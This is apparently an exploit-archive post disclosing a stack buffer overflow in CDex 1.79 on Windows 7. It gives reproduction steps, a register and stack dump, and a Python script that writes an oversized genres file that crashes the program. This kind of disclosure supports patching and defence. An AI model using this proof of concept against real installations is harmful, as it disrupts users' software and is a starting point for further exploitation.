CDex Genre 1.79 Stack Buffer Overflow
Posted on 13 October 2015
''' ******************************************************************************************** # Exploit Title: CDex Genre Stack Buffer Overflow # Date: 10/9/2015 # Exploit Author: Un_N0n # Software Link: http://cdex.mu/download # Version: 1.79 # Tested on: Windows 7 x86(32 BIT) ******************************************************************************************** [Steps to Produce the Crash]: 1- Generate a File by python code mentioned below. 2- Goto C:UsersYourUsernameAppDataLocalCDexLocalCDDB 3- Replace the Old CDexGenres.txt with New CDexGenres.txt which is Produced by Python Code. 4- Open Up CDex.exe. ~Software will crash. On Further Analysis, We come to know that it is Stack-based-BOF. [REG-DUMP]: EAX 00000000 ECX 779DD018 ASCII " STATUS_STACK_BUFFER_OVERRUN encountered " //May be handled but yet application crashes. EDX 0012F1A1 ASCII 0A,"STATUS_STA" EBX 00749338 CDex.00749338 ESP 0012F3E8 EBP 0012F464 ESI 00000000 EDI 002C7AC8 EIP 779DCE96 kernel32.779DCE96 0012F3F4 002C7AC8 0012F3F8 002E25F8 ASCII "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx> 0012F3FC 002E5FD8 0012F400 002E44A0 0012F404 000003F8 0012F408 0000007F 0012F40C 0012F504 0012F410 00260000 0012F414 77C97B89 RETURN to ntdll.77C97B89 from ntdll.RtlFillMemoryUlong 0012F418 002E2580 ASCII "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx> 0012F41C 00001190 ''' [Code to produce CDexGenres.txt] buffer = "A"*66666 file = "CDexGenres.txt" f = open(file,'w') f.write(buffer) f.close() ''' ********************************************************************************************** '''